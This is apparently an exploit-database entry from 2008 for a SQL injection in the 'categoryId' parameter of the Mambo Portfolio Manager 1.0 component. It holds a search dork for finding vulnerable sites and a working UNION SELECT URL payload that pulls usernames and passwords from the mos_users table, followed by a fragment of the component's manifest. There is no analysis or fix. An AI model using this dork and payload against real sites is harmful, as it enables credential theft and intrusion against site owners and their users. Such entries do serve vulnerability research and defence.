Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection

Author: it's my
type: webapps
platform: php
port: 
date_added: 2008-02-17 
date_updated: 2016-12-06 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################

   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# milw0rm.com [2008-02-18]